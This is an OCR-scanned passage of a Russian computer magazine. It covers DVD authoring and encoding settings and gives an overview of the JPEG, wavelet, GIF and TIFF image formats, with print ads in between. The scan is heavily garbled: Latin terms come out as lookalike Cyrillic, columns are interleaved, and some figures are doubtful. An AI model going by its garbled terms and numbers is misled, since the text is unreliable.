переходим дальше. 

СЕарІегз. Эти настройки позволяют задать интервал, с ко- 
торым будут ставиться так называемые закладки, то есть, 
когда на пульте нажмешь «Далее», фильм перемотается на 
пять минут вперед. Стандартные настройки вполне оправ- 
дывают себя, так как ставить более короткие промежутки 
глупо, а если делать их более длинными, то при просмотре, 
возможно, придется смотреть некоторые куски по второму 
разу. Так что я предлагаю оставить все так, как есть. 
АиІНогіпд. Данная вкладка у меня заморожена. Да, 
собственно, в ней нет ничего полезного, так что идем далее. 
Епсобіпд. Основная вкладка, от которой зависит, каким 
впоследствии будет картинка нашего фильма. Міпітит 
Ьіігаіе позволяет выбрать, каким будет поток при мини- 
мальном кодировании. Рекомендованное значение — ноль, 
но оно нас не устраивает, так что поднимем его хотя бы до 
единицы. Максимальный битрейт оставим по максимуму. 
ТагдеІЗІге позволяет указать кодеку, на какой размер про- 
екта ему ориентироваться при кодировании видео. Указать 
можно два варианта болванок: обычную (4400 МЬ) или 
двухслойную (8200 МЬ). Можно, конечно, вписать значение 
вручную, но это полезно в тех случаях, когда ты подготав- 
ливаешь сразу несколько фильмов для последующего объ- 
единения в один — пока нам это не требуется. Сопѵегвіоп 
Ргіогііу позволяет выбрать приоритет для работы процесса. 
Если компьютер у тебя шустрый, и во время создания 
фильма заниматься ты ничем не думаешь, то можно его бу- 
дет поднять повыше — скорость от этого увеличится, но 
несильно. А если компьютер слабоватый, то разницы ника- 
кой ты не увидишь. Впрочем, поменять это значение можно 
и во время работы программы, так что оставляй его дефо- 
лтным, а разберемся потом. 

Вкладки Аибіо и ЗиЫІІІез ничего полезного в себе не несут, 



так что заострять на них внимание мы не будем. 

Вигпіпд. Программа может после окончания конвертирова- 
ния автоматически прожечь результат на диск, но надо ли 
это нам? Я всегда предпочитаю для начала посмотреть, что 
получилось на компьютере, а потом уже вручную прожечь. 
ТѴ Рогтаі. Обо всех данных настройках я уже говорил, еще 
когда про Ыего рассказывал, так что не будем заострять 
внимание и на этом. 

Все, с настройками разобрались, теперь обговорим неко- 
торые нюансы. Не стоит добавлять в проект более одного 
файла, так как программа кодирует их не в разные папки, 
а в одну. Причем проигрываться в плеере будет только 
первый фильм, а второй лишь займет место. 

Вот, вроде, и все. Добавляем файл, нажимаем «СопѵеП» 
и смотрим на бегущие циферки. Если кликнуть два раза 
по окну о файлом, то появится превью-экран, который 
будет отображать результат кодирования фильма. В па- 
нели Асііоп есть очень удобная вещь, которая позволяет 
ставить на паузу кодирование, что иногда является очень 
полезным свойством. Еще в риалтайме можно менять 
приоритет процесса. 

Несомненным достоинством программы можно считать ее 
легкость и простоту. Недостатки: для создания много- 
фильмовых дисков надо прибегать к дополнительным 
средствам, а также отсутствует возможность создания ме- 
ню для диска. В случае, который мы рассматриваем, нам 
этого и не нужно, а вот если ты захочешь записать на диск 
не фильм, а коллекцию клипов или мультиков, то придется 
искать более сложные варианты. 

Ну что, о простых вещах мы поговорили, теперь давай 
взглянем на более сложные вещи. 



ТМРѲЕИС 



Проверка материала сначала на 



Более сложная программа, но при 
вложении достаточного количества 
времени и сил позволяет добиться 
шикарной отдачи. 

При старте нам сразу предложат сде- 
лать все с помощью визарда — его 
шаги мы и рассмотрим. Для начала на- 
до выбрать, в каком режиме будем му- 
тить кино. Кстати, у нас тут раздолье: 
можно делать не только ОѴО-диски, но 
и 3/Ѵібео-СЭ. Для выбора подходяще- 
го тебе, конечно, лучше знать техни- 
ческий английский, хотя разобраться 
по знакомым символам легко. О режи- 
мах я уже говорил — здесь надо толь- 
ко рассмотреть так называемые Бода 
Везоіигіоп режимы. Они позволяют де- 
лать картинку в стандартных пропор- 
циях (4:3 и 16:9), но с меньшим разре- 
шением. Если вдруг надумаешь кле- 




компьютере. а потом на плеере с помощью РѴР-Кѵѵ диска предохраняет от неожиданностей 



пать помногу фильмов на один диск, 
то выбирай его, но предупреждаю, что 
качество будет отвратное — такое, что 
лучше книгу почитать, чем смотреть 
такой «шедевр». Также надо выбрать, 
как будем кодировать аудио — МР2- 
кодек позволяет сэкономить немного 
места, но надо ли оно нам? Пока что 
нет, так что выбираем «РСМ Аибіо» и 
жмем «Дальше». Следующим шагом 
надо выбрать файл, который будем 
кодировать. Если аудио уже совмеще- 
но с видео, то оно автоматически до- 
бавится, если нет — добавляй его руч- 
ками. «Азресі Ваііо» позволяет выб- 
рать, с каким расширением будет ко- 
дироваться картинка. Если фильм уже 
в расширении, необходимом нам (а 
это 720x576 для РАБ-режима и 
720x480 для ІМТЗС-режима), то выби- 



рай «1:1», если нет — тот, который 
нам подходит. Количество линий регу- 
лирует черные полосы снизу экрана. 
Мне подходит режим «16:9 625 Ііпе 
РАБ», я выбираю его, а ты действуй по 
обстоятельствам. Идем дальше. На 
следующем шаге нам предлагают ко- 
дировать не весь фильм, а только его 
кусок в меню Зоигсе Рапде. Обрезать 
край картинки в меню СІІр Ргате или 
попытаться погасить лишние шумы на 
картинке в меню ІМоізе Вебисііо? На 
этом шаге нам позволено настроить 
дополнительные опции, кликнув на 
«оіітег зейіпдз». Тут стоит рассмотреть 
некоторые аспекты внимательней. На 
вкладке Ѵібео в меню Ваіе сопігоі 
тобе можно выбрать, по какому прин- 
ципу будет кодироваться видео, и выс- 
читать битрейт, о котором мы уже го- 
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Создай свою реальность 

с компьютером ОЕРО Едо на базе процессора ІпЬеІ® РепЬіит® 4 с технологией НТ 




РетіипГ4 НТ 
іпзісіе™ 




Включи ОЕРО Едо — и перед тобой откроется новая реальность твоих 
любимых компьютерных игр. Наслаждайся быстротой реакции и скоростью, 
исследуй распахнувшийся перед тобой мир высококачественной 
компьютерной графики и настоящего экшена. Теперь эта цифровая 
реальность может стать твоей благодаря компьютеру ОЕРО Едо на базе 
процессора ІпЬеІ® Репііит® 4 с технологией НТ. 




ОЕРО Едо 525 ОНИ: 

• процессор ІпЪеІ® Репйит® 4 640 с технологией НТ 

• чипсет ІпТеІ® 925ХЕ с улучшенной архитектурой 

• сверхбыстрая память СЮР2 

• новые возможности графики РСІ-Ехргезз 

• реалистичный объемный 8-канальный звук 

Компания ОЕРО СотриЪегз 

Если нужен компьютер, покупай у производителя 
на ѵѵѵѵѵѵ.сіеро.ги или по тел. (495) 969-22-00 




Обозначения Сеіегоп, Сеіегоп Іпзісіе, СепЪгіпо, Сепігіпо Іодо, ІпЬеІ, ІпіеІ Соте, ІпЬеІ Іодо, ІпѣеІ Іпзісіе, ІпЬеІ Іпзісіе Іодо, ІпЬеІ ЗреесІЗЪер, ІпЪеІ Ѵііѵ, ІпСеІ Хеоп, ІЬапіит, ІЬапіит Іпзісіе, Соге Іпзісіе, РепЬіит и РепЬіит 
Іпзісіе являются товарными знаками либо зарегистрированными товарными знаками, права на которые принадлежат корпорации ІпЪеІ или ее подразделениям на территории США и других стран. 
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ОЦТРІО 




Не стоит сразу хвататься за кодирования Фильмов — экспериментируй на маленьких кусочках. 



ворили выше. В самом низу вкладки 
находится пункт Моііоп ЗеагсН 
Ргесівіоп, который отвечает за ско- 
рость расчета движений на картинке. 
Выбираем лучший вариант — Нідбезі 
ОиаІІІу — и жмем «Ок». На рассмотре- 
ние остальных вкладок не будем тра- 
тить время — на это есть мануалы, в 
которых все подробно описано, а я 



лишь рассказываю основные принци- 
пы работы с программой. Жмем «Ыехі» 
и переходим к следующему шагу. 
В этом окне нам предоставляется от- 
чет о будущем файле — бегло прос- 
матриваем его, и если не находим ни- 
каких проблем, то снова кличем 
«Ыехі». Выбираем имя и папку файла 
для последующего сохранения, убеж- 



даемся, что галочка стоит напротив 
ЗіаП епсобіпд іттебіаіеіу — чтобы 
кодирование началось сейчас и нам 
не предложили создать новый про- 
ект. Все готово, жмем «Ок». После 
окончания кодирования у нас будет 
два файла — звук и видео, — из кото- 
рых мы можем собрать диск в прог- 
рамме ОѴОЬаЬ. 



Об этой программе можно рассказывать часами, можно писать по ней диссертации, но то, что она могущественна, как 
Фотошоп в создании графики, — это бесспорно. Я не буду говорить о ней ни слова, так как в Интернете очень много 
русскоязычных мануалов, примеров, форумов о ней. Тема слишком большая, поэтому я навряд ли сумею рассказать 
о ней грамотней и более полно, чем уже существующие готовые примеры. 



После того как проект готов, надо его прожечь на диск. 
Программ для записи полно, так что выбирай на свой вкус 
и цвет. Лично я пользуюсь Ыего 7 или Азбатроо Вигпіпд 
Зіисііо 5. Они довольно хорошо пишут видео и никогда ме- 
ня не подводили. Сам ОѴО-диск состоит из двух папок, ко- 
торые и надо записать: ѴЮЕО_ТЗ — это папка, в которой 



лежат все файлы, а АЮО_ТЗ — папка, которая в основ- 
ном пустует, но иногда в нее помещается звук, если звуко- 
вых дорожек несколько. Записать файлы на диск особого 
труда не составит — тут, я думаю, ты и без моей помощи 
справишься, только не забудь выбрать режим записи 
ОѴО-ѴісІео, а не просто прожиг данных. 



Вот мы и рассмотрели основы создания 
собственной ОѴО-коллекции. Когда я пе- 
регонял в ОѴО более 80 фильмов, я пот- 
ратил не одни сутки в ожидании оконча- 
ния конвертирования, запорол не одну 
болванку и прочитал целый том всевоз- 
можных форумов и мануалов. Цель напи- 



сания этой статьи — рассказать о самых 
основах. Так сказать, о верхушке айс- 
берга. Если кого-нибудь это заинтересо- 
вало, то я готов помочь советом или на- 
писать еще статьи, целью которых будет 
рассмотрение каких-либо более тонких 
деталей и аспектов. В данный момент у 



меня на жестком диске полно места из- 
за отсутствия на нем фильмов, но зато 
есть целая стопка коробок с ОѴО-диска- 
ми, и, думаю, что в следующей статье 
я расскажу, как сделать из железки до- 
вольно классную подставку под диски :). 

ВШАКУ ѴОГІК 5 тг; 
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РКО 

подарки 

# * 



Создай настроение! 



Подарите себе и своим любимым хорошее 



настроение. 




€ѣ Мегафон 

Будущее зависит от тебя 
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ТЕХТ ѴѴЕІРЮ АКА БЕРЕНШТЕЙН ЕВГЕНИЙ / ІСО# 522715/ 



ВЕСЕЛЫЕ 

КАРТИНКИ 

ГРАФИЧЕСКИЕ ФОРМАТЫ И ТЕХНОЛОГИЯ СЖАТИЯ ИЗОБРАЖЕНИЙ 



йй ОДНАЖДЫ, В НАЧАЛЕ ФЕВРАЛЯ, Я СИДЕЛ С БУБЛИКОМ И ЕЩЕ ДВУМЯ ЗАМЕЧАТЕЛЬНЫМИ 
ЛЮДЬМИ, ИМЕНА КОТОРЫХ СЛИШКОМ ИЗВЕСТНЫ, ЧТОБЫ ИХ НАЗЫВАТЬ, В ОДНОМ 
ПРЕКРАСНОМ КАФЕ НА КИТАЙ-ГОРОДЕ. И РАЗГОВОР У НАС С РЕДАКТОРОМ РУБРИКИ 
РС_20ИЕ ЗАШЕЛ ВОТ О ЧЕМ: ВСЕ МЫ ЧАСТО СМОТРИМ КАРТИНКИ В ИНТЕРНЕТЕ НА 
РАЗЛИЧНЫХ ВЕСЕЛЫХ САЙТАХ, ИНОГДА МЫ САМИ ИХ ОБРАБАТЫВАЕМ. НО ДАЛЕКО НЕ 
КАЖДЫЙ ЗНАЕТ, КАК СЖИМАЕТСЯ ИЗОБРАЖЕНИЕ И КАК ОНО ХРАНИТСЯ. ВЕДЬ НИКТО НЕ 
ХОЧЕТ ЖДАТЬ ПО 10 МИНУТ, ПОКА ЗАГРУЗИТСЯ КАКАЯ-НИБУДЬ ОТКРОВЕННАЯ ФОТКА ИЛИ 
ЖЕ ОТКРЫТКА ОТ ЛЮБИМОГО ЧЕЛОВЕКА. ТАК ВОТ О НЕКОТОРЫХ ПРИНЦИПАХ СЖАТИЯ 
ИЗОБРАЖЕНИЙ МЫ СЕГОДНЯ И ПОГОВОРИМ. 



Сначала вернемся на несколько лет назад, чтобы понять, 
какие алгоритмы сжатия бывают. Первыми для архивации 
изображений стали применяться привычные алгоритмы. 
Те, что использовались и используются в системах резерв- 
ного копирования, при создании дистрибутивов и т.п. Эти 
алгоритмы архивировали информацию без изменений. Од- 
нако основной тенденцией в последнее время стало ис- 
пользование новых классов изображений. Многие из них 
практически не сжимались, хотя обладали явной избыточ- 
ностью. Это привело к созданию нового типа алгоритмов, 
сжимающихся с потерей информации. Как правило, коэф- 
фициент архивации и, следовательно, степень потерь ка- 
чества в них можно задавать. При этом достигается комп- 
ромисс между размером и качеством изображений. 

Но и тут не все так просто. Стоит отметить, что одна из серь- 
езных проблем машинной графики заключается в том, что до 
сих пор не найден адекватный критерий оценки потерь каче- 
ства изображения. А теряется оно постоянно — при оциф- 
ровке, при переводе в ограниченную палитру цветов, при пе- 
реводе в другую систему цветопредставления для печати и, 
что для нас особенно важно, при архивации с потерями. 
Специалисты годами пытались выработать этот объективный 
критерий, который бы позволил четко определить и оценить 
потери при сжатии, но к единому мнению так и не пришли. 
Поэтому лучше всего потери качества изображений оце- 
нивают наши глаза. Отличным считается сжатие, при ко- 



тором невозможно на глаз различить первоначальное и 
разархивированное изображения. Какое из изображений 
подвергалось архивации, можно сказать, только сравни- 
вая две находящихся рядом картинки. При дальнейшем 
увеличении степени сжатия, как правило, становятся за- 
метны побочные эффекты, характерные для каждого оп- 
ределенного алгоритма. На практике даже при отличном 
сохранении качества в изображение могут быть внесены 
регулярные специфические изменения. Поэтому алгорит- 
мы архивации с потерями не рекомендуется использо- 
вать при сжатии изображений, которые в дальнейшем 
собираются либо печатать с высоким качеством, либо 
обрабатывать программами распознавания образов. 
Неприятные эффекты с такими изображениями, как мы 
уже говорили, могут возникнуть даже при простом масш- 
табировании изображения. 

Обращаю твое внимание на то, что сжатие изображений 
не всегда является необходимым, я не имею в виду, что 
графику не надо обрабатывать, сжимать до приемлемого 
размера, просто нужно уметь четко различать ситуации, 
когда это идет на пользу, а когда — во вред. Поэтому сей- 
час мы поговорим о таких известных и популярных алго- 
ритмах, как ^ЕС, ѴѴАѴЕЬЕТ, и рассмотрим форматы ѲІЕ 
и ЛЕЕ, реализованные на основе алгоритма ЬЯЛ/. 



КАК, 

И ВЫ ЦАРЬ? 
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АЛГОРИТМ 

^Е<3 



Что же такое ^ЕѲ и с чем его едят? А 
знаешь ли ты, как работает этот извест- 
ный алгоритм? На самом же деле не все 
так просто, как кажется на первый 
взгляд, когда мы в АбоЬе РИоІозЬор РЗЭ 
картинку сохраняем в формате иРЕѲ, 
тем самым, сжимая ее. 

Алгоритм 9РЕѲ стандартизован относи- 
тельно недавно — в 1991 году. Но уже 
тогда существовали алгоритмы, сжимаю- 
щие сильнее при меньших потерях каче- 
ства. Дело в том, что действия разработ- 
чиков стандарта были ограничены мощ- 
ностью, существовавшей на тот момент 
техники. То есть даже на персональном 
компьютере алгоритм должен был рабо- 
тать меньше минуты на среднем изобра- 
жении, а его аппаратная реализация 
должна быть относительно простой и де- 
шевой. Алгоритм должен быть симмет- 
ричным (время разархивации примерно 
равно времени архивации). 

9РЕО — один из самых новых и доста- 
точно мощных алгоритмов. Он прак- 
тически является стандартом де-фак- 
то для полноцветных изображений. 
Оперирует алгоритм областями 8x8, 
на которых яркость и цвет меняются 
сравнительно плавно. И это является 
важнейшим элементом алгоритма. 
Вследствие этого, при разложении 
матрицы такой области в двойной ряд 
по косинусам значимыми оказывают- 
ся только первые коэффициенты. Та- 
ким образом, сжатие в ТРЕѲ осущес- 



твляется за счет плавности измене- 
ния цветов в изображении. 

Этот алгоритм разработан группой 
экспертов в области фотографии спе- 
циально для сжатия 24-битных изобра- 
жений. 9РЕѲ (ЭоіпІ Ріюіодгаріііс Ехрегі 
Огоир) — подразделение в рамках 130 
— Международной организации по 
стандартизации. В целом алгоритм ос- 
нован на дискретном косинусоидаль- 
ном преобразовании, применяемом к 
матрице изображения для получения 
некоторой новой матрицы коэффици- 
ентов. Для получения исходного изоб- 
ражения применяется обратное пре- 
образование. 

Все вышесказанное будет темным ле- 
сом для человека, который никогда с 
этим не сталкивался, поэтому мы пой- 
дем более простым путем. Самым глав- 
ным является то, что изображение раз- 
бивается на квадратики размером 8x8 
пикселей. Сразу возникает вопрос: по- 
чему? Ответ оказывается на удивление 
прост: внутри такой области яркость и 
цвет меняются весьма плавно, поэтому 
алгоритм отрезает у частотной состав- 
ляющей часть, которая несет гораздо 
меньше информации. За счет несовер- 
шенства человеческого глаза и появля- 
ется возможность сжатия данных. 
Таким образом, основные стадии этого 
алгоритма следующие. Изображение 
разбивается на шаблоны 8x8 точек. Для 
каждого шаблона (матрицы) выполняет- 



ся дискретное косинусоидальное пре- 
образование (ДКП). Давай разберемся, 
зачем нам это преобразование нужно. 
ДКП раскладывает изображение по 
амплитудам некоторых частот. Далее из 
получившихся частот, с помощью спе- 
циальной весовой таблицы отбираются 
наиболее существенные для визуаль- 
ного восприятия. Эта процедура назы- 
вается квантованием и является един- 
ственным этапом, на котором происхо- 
дит потеря информации. Далее матрица 
отобранных частот представляется ком- 
пактным образом и кодируется. 
Несколько слов хотелось бы сказать 
о преимуществах и недостатках алго- 
ритма ^ЕѲ. 

Существенными положительными 
сторонами алгоритма является то, 
что, во-первых, пользователь может 
сам задавать степень сжатия изобра- 
жения, во-вторых, выходное цветное 
изображение может иметь 24 бита на 
точку. Отрицательной стороной алго- 
ритма является то, что при повышении 
степени сжатия изображение распа- 
дается на отдельные квадраты (8x8). 
Это связано с тем, что происходят 
большие потери в низких частотах 
при квантовании, и восстановить ис- 
ходные данные становится невозмож- 
но. И еще одним минусом 9РЕѲ явля- 
ется эффект Гиббса — ореолы по 
границам резких переходов цветов. 



ВОЛНОВОЙ 

АЛГОРИТМ 

ѴѴАѴЕІ.ЕТ 



ѴѴаѵеІеІ — также относительно новый алгоритм сжатия изоб- 
ражений и видео, при котором, в отличие от ^ЕѲ, изобра- 
жение обрабатывается без разбиения на квадраты. После 
того как фирма Апаіодие Эеѵісез выпустила специализиро- 
ванную микросхему аппаратного ѵѵаѵеіеі-сжатия видео, дан- 
ный формат стал базисом многоканальных цифровых сис- 
тем видеонаблюдения и цифровых видеорегистраторов. 

Как и в случае формата 9РЕѲ, в ѴѴаѵеІеІ сжатие осущес- 
твляется с необратимыми потерями информации, но изоб- 
ражение не имеет «мозаичных» дефектов даже при очень 
больших степенях компрессии. Достоинство — отсутствие 
видимых дефектов даже при большом коэффициенте 
сжатия видео, когда снижается резкость, а изображение 
просто становится менее четким. 

Идея алгоритма заключается в том, что мы сохраняем в 
файл разницу — число между средними значениями со- 
седних блоков в изображении, которая обычно принимает 
значения, близкие к нулю. 

В итоге для одной картинки мы получаем 4 матрицы. Так, 
для изображения 512x512 пикселей получим после первого 
преобразования 4 матрицы размером 256x256 элементов. В 
первой, как легко догадаться, будет храниться уменьшен- 
ная копия изображения. Во второй — усредненные разнос- 



ти пар значений пикселей по горизонтали. В третьей — ус- 
редненные разности пар значений пикселей по вертикали. 
В четвертой — усредненные разности значений пикселей 
по диагонали. Подобную операцию мы можем повторить 
и для уменьшенной копии изображения, получив вместо 
первой матрицы 4 матрицы размером 128x128. 

С математической точки зрения, основной особенностью 
ѵѵаѵеіеі-преобразования является возможность разложить 
изображение на два компонента: низкочастотную часть, со- 
держащую основную информацию, и высокочастотную 
часть, содержащую лишь малую долю информации. Низко- 
частотную часть можно опять разложить на две части и т.д. 
Оставшаяся часть изображения содержит лишь малые вы- 
сокочастотные компоненты. В результате последователь- 
ного применения ѵгаѵеіеі-преобразований получается изоб- 
ражение, занимающее небольшой объем места на диске. 
Отличие ѴѴаѵеІеІ от 9РЕѲ состоит в использовании вейв- 
лет-преобразования вместо дискретного косинусоидаль- 
ного преобразования, а также в применении преобразова- 
ния к полному изображению, а не к шаблону 8x8. 

И все-таки, что же такое ѴѴАѴЕІ_ЕТ? Слово «ѴѴАѴЕІЕТ» 
обозначает маленькую волну. Под «маленькой» понимает- 
ся то, что эта функция имеет конечную длину. Эта волна 
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исходное изображение: лицо I сжатие исходного изображения I сжатие исходного изображения 

I алгоритмом 9РЕѲ приблизительно в 20 раз I алгоритмом ѴѴаѵеІеІ приблизительно в 20 раз 



может быть разных видов. «Волна» же отражает тот факт, 
что ѴѴАѴЕБЕТ-функция осциллирует, то есть, грубо говоря, 
имеет волнообразную форму. ѴѴАѴЕБЕТ — это семейство 
функций, которые локальны по времени и частоте и в ко- 
торых все функции получаются из одной посредством ее 
сдвигов и растяжений по оси времени (они «идут друг за 
другом»), благодаря чему появляется возможность анали- 
за сигнала во всех точках. Математики иногда называют 
ѴѴАѴЕЕЕТ всплесками, что определенным образом их ха- 
рактеризует. Первой особенностью ѴѴАѴЕЕЕТ является то, 
что они обладают свойством одновременной локальности 
по частоте и по времени. Именно это свойство сделало их 



столь пригодными для применения. А наибольшей попу- 
лярностью ѴѴАѴЕЕЕТ стали пользоваться, когда открыли 
еще одно их свойство — наличие быстрого алгоритма пре- 
образования. Можно без преувеличения сказать, что 
ѴѴАѴЕЕЕТ сделали революцию в области теории и практи- 
ки обработки нестационарных сигналов. Особо большое 
развитие получила практика применения «маленькой вол- 
ны» для решения задач сжатия и обработки изображений, 
являющихся нестационарными по своей природе. 
В этой области применение ѴѴАѴЕЕЕТ-преобразований 
позволило достичь одновременного снижения сложности 
и повышения эффективности кодеров. 



3 основе формата ѲІР лежит алго- 
эитм Б2ѴѴ. Название алгоритм полу- 
чил по первым буквам фамилий его 
оазработчиков — БетреІ, 2іѵ и ѴѴеІсМ. 
Коэффициенты компрессии данного 
алгоритма примерно 1000, 4, 5/7 (луч- 
ший, средний и худший коэффициен- 
ты). Сжатие в 1000 раз достигается 
только на одноцветных изображениях 
эазмером, кратным примерно 7 Мб. 
Так, если в изображении имеются набо- 
оы из розового, оранжевого и зеленого 
пикселей, повторяющиеся 50 раз, Б2ѴѴ 

Ух 


апьной таблице цветов, называемой 
индексированной палитрой. 

Файлы ѲІР могут также содержать 
различные оттенки серого цвета. Су- 
ществуют две основные версии фор- 
мата ѲІР — ѲІР87 и ѲІР89а. Они наз- 
ваны так по году стандартизации. Обе 
версии поддерживают способ предс- 
тавления графического файла с че- 
редованием строк. Более поздний ва- 
риант ѲІР89а допускает задание од- 
ного цвета в качестве прозрачного. 
Прозрачность подразумевает, что один 


«через строчку» (Іпіегіасеб), благодаря 
чему, имея только часть файла, можно 
увидеть изображение целиком, но с 
меньшим разрешением. Это достигает- 
ся за счет записи, а затем подгрузки 
сначала 1,5, 10 и т.д. строчек пикселей 
и растягивания данных между ними, вто- 
рым проходом следуют 2, 6, 1 1 строчки, 
разрешение изображения в интернето- 
вском браузере увеличивается. Таким 
образом, задолго до окончания загруз- 
ки файла пользователь может понять, 
что внутри, и решить, стоит ли ждать, 


ФОРМАТ 

ѲІР 


ШЗН С01_ОРі (32 — с>4 1 ЫСЯЧИ ОТТЕНКОВ). ИНЫМИ СЛОВАМИ. бІР-ИЗОБРАЖЕНИЯ 


ДО) ІЖНЫ СОСТОЯТЬ ИЗ 256 ИЛИ МЕНЬШЕГО ЧИСЛА ЦВЕТОВ 


выявляет это, присваивает данному на- 
бору отдельное число, например 7, и за- 
тем сохраняет эти данные 50 раз в виде 
числа 7. Метод Б2ѴѴ лучше действует на 
участках однородных, свободных от 
шума цветов, он действует гораздо луч- 
ше, чем алгоритм ВБЕ при сжатии про- 
извольных графических данных, но 
процесс кодирования и распаковки 
происходит медленнее. 

/Ізначально формат ѲІР (ѲгарЬісз 
піегсбапде Еогтаі) был введен ком- 
панией СотриЗегѵе в качестве пер- 
вого формата для передачи и демон- 
страции графики через модем. 

Цвет каждого пикселя кодируется 8 би- 
тами, поэтому (ЗІР-файл может содер- 
жать до 256 цветов. Цвета, которые ис- 
пользуются в ѲІР-изображении, хра- 
нятся внутри самого файла в специ- 


цвет изображения (обычно это цвет фо- 
на) может быть объявлен прозрачным. 
Это ведет к тому, что вместо фона изоб- 
ражения виден просвечивающий сквозь 
него фон самой ѴѴеЬ-страницы. Благо- 
даря этому изображение на странице 
выглядит более естественным. 
ѲІР-файлы можно также использовать 
для создания на экране несложной 
анимации. 

Основным ограничением ѲІР-файлов 
является их неспособность хранить и 
демонстрировать неиндексированные 
изображения, подготовленные в режи- 
ме Тгие Соіог (16,8 миллиона оттенков) 
или НідИ Соіог (32 — 64 тысячи оттен- 
ков). Иными словами, ѲІР-изображе- 
ния должны состоять из 256 или мень- 
шего числа цветов. 

ѲІР позволяет записывать изображение 


когда файл поднимется весь. Такая за- 
пись незначительно увеличивает раз- 
мер файла, но это, как правило, оправ- 
дывается приобретаемым свойством. 
Сжатие файлов в формате ѲІР является 
сжатием без потерь. Это означает, что 
упаковка изображения никоим образом 
не сказывается на его качестве. При 
этом сжатие оказывается наиболее эф- 
фективным в тех случаях, когда в соста- 
ве изображения имеются большие об- 
ласти однородной окраски с четко очер- 
ченными границами. И наоборот, сжатие 
по алгоритму ѲІР крайне неэффективно 
при наличии областей с градиентной ок- 
раской или случайным распределением 
цветовых оттенков, что имеет место при 
использовании различных методов 
настройки растра или сглаживания кра- 
ев области изображения. 



Аппаратно независимый формат ТІЕР (Таддеб Ітаде ЕІІе 
Еогтаі) на сегодняшний день является одним из самых 
распространенных и надежных, его поддерживают практи- 
чески все программы на РС и МасіпІозЬ, так или иначе свя- 
занные с графикой. ТІЕР является лучшим выбором при им- 



порте растровой графики в векторные программы и изда- 
тельские системы. Ему доступен весь диапазон цветовых 
моделей: от монохромной до ВѲВ, СМѴК и дополнительных 
цветов Рапіопе. НЕЕ может сохранять обтравочные конту- 
ры, Альфа-каналы и другие дополнительные данные. 



ФОРМАТ 

ТІРР 
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ТІРР имеет две разновидности: для МасіпІозН и РС. Это 
связано с тем, что процессоры Моіогоіа читают и записы- 
вают числа слева направо, а процессоры Іпіеі — наобо- 
рот. Современные программы могут без проблем исполь- 
зовать оба варианта формата. 

В формате ТІРР также используется І_2ѴѴ-компрессия. Ряд 
старых программ, например ОиагкХРгезз 3.x, АбоЬе 
Зігеатііпе, многие программы-распознаватели текста, не 
умеют читать сжатые файлы ТІРР, однако, если вы пользу- 
етесь новым программным обеспечением, нет причины не 



использовать компрессию. 

Многие цифровые камеры предлагают режим записи 
снимков в формате ТІРР. Однако из-за ограниченного 
объема свободного места на носителе, а также ограниче- 
ний в возможности реализации обрабатывающей функ- 
ции в цифровых камерах используется только 8-битная 
версия формата. Сканеры высшего ценового диапазона, 
как правило, обладают поддержкой 16-битной версии 
ТІРР. 



ВСЕМУ 

СВОЕ 

ВРЕМЯ 



Теперь, когда мы знаем, как работают 
известные алгоритмы сжатия, непло- 
хо бы уяснить, когда следует исполь- 
зовать каждый определенный фор- 
мат, ведь до сих пор существует проб- 
лема экономии дискового простран- 
ства. Безусловно, дома на своем ПК, 
где объем памяти у харда 80 Гб и вы- 
ше, нет смысла экономить место, об- 
ращая внимание на какие-то картин- 
ки, тем не менее на различных плат- 
ных и бесплатных серверах в инете 
место ограниченно, поэтому сущест- 
венно увеличить свободное простран- 
ство можно при разумном хранении 
файлов изображений. 

Итак, начнем с формата ѲІР. Исполь- 
зуй ѲІР-формат для хранения всех ма- 
лоразмерных графических элементов: 
значков-ссылок, надписей и миниа- 
тюр. Применяй этот формат для хра- 
нения изображений любого размера, 
изначально состоящих из больших об- 
ластей однородной окраски. Исключе- 
ние из данного перечня могут состав- 
лять файлы, содержащие необычно 
много цветов и тонких цветовых пере- 



ходов. Лучшим советчиком в этом слу- 
чае может служить эксперимент. 

Пару слов о ,1РЕѲ. Этот формат целе- 
сообразно использовать во всех слу- 
чаях, когда размер изображения по 
каждой из координат превышает 200 
пикселей, а само изображение предс- 
тавляет собой полноценную фотогра- 
фию или образец художественной 
графики, включающий тонкие перели- 
вы цветов. 

Изображения в формате ТІРР следует 
хранить, если ты не хочешь терять ка- 
чество картинки. Размеры файлов 
этого формата довольно велики, а 
потому изображения ТІРР для разме- 
щения в Интернете не годятся. 
Допустим, что у нас есть очень инте- 
ресный файл в формате ТІРР, который 
мы хотим разместить на своем сайте. 
Для этого нам необходимо преобразо- 
вать этот файл в один из наиболее 
пригодных для инета форматов (ѲІР 
или ^ЕѲ). Преобразование форматов 
графических файлов можно выпол- 
нить с помощью графических редакто- 
ров, воспринимающих файлы разных 



форматов. Для этих целей вполне мож- 
но воспользоваться банальным графи- 
ческим редактором Рітоіо ЕсІІІог, входя- 
щим в МісгозоЙ ОНІсе, либо коронным 
АбоЬе РЬоІозЬор. Эти редакторы уме- 
ют работать практически со всеми 
распространенными форматами гра- 
фических файлов: ТІРР, РСХ, ѲІР, 6РЕѲ 
и др. При преобразовании файлов 
можно уточнить желаемые параметры. 
Например, выполнить преобразова- 
ние из цветного в черно-белый фор- 
мат, выбрать количество цветов, 
степень сжатия файла или фактор 
качества — большой файл и лучшее 
качество изображения или же ма- 
ленький файл с более низким каче- 
ством изображения. Все это весьма 
просто и разобраться с данным воп- 
росом, если ты этого еще не сделал, 
не составит большого труда. Ведь 
основное назначение знания — это 
расширение возможностей челове- 
ка, увеличение степени его свобо- 
ды, когда человек поступает так, как 
считает нужным, а не так, как вынуж- 
дают его обстоятельства. 



ТНЕ РІІИІВЕ 
13 СОМІЫ’ ОІЧ 



С взрывным распространением инета, который характе- 
ризуется передачей изображений по сравнительно мед- 
ленным каналам связи, использование ѲІР (алгоритм І_2ѴѴ) 
и 6РЕѲ (вариант алгоритма 6РЕѲ), реализующих эту воз- 
можность, резко возросло. То, что новый алгоритм, напри- 
мер ѴѴаѵеІеІ, поддерживает такую возможность — сущест- 
веннейший плюс для него сегодня. 

В то же время мы можем рассмотреть такое редкое на се- 
годня требование, как устойчивость к ошибкам. Можно 
предположить, что в скором времени (через 5 — 10 лет) с 
распространением широковещания в Интернете для его 
обеспечения будут использоваться именно алгоритмы, ус- 
тойчивые к ошибкам, даже не рассматриваемые в сегод- 
няшних статьях и обзорах. 

Знание файловых форматов и их возможностей является од- 
ним из ключевых факторов в допечатной подготовке изданий, 



подготовке изображений для ѵѵеЬ и в компьютерной графике 
вообще. Да, сегодня нет такого калейдоскопа расширений, 
как в начале 90-х, когда каждая компания-производитель ре- 
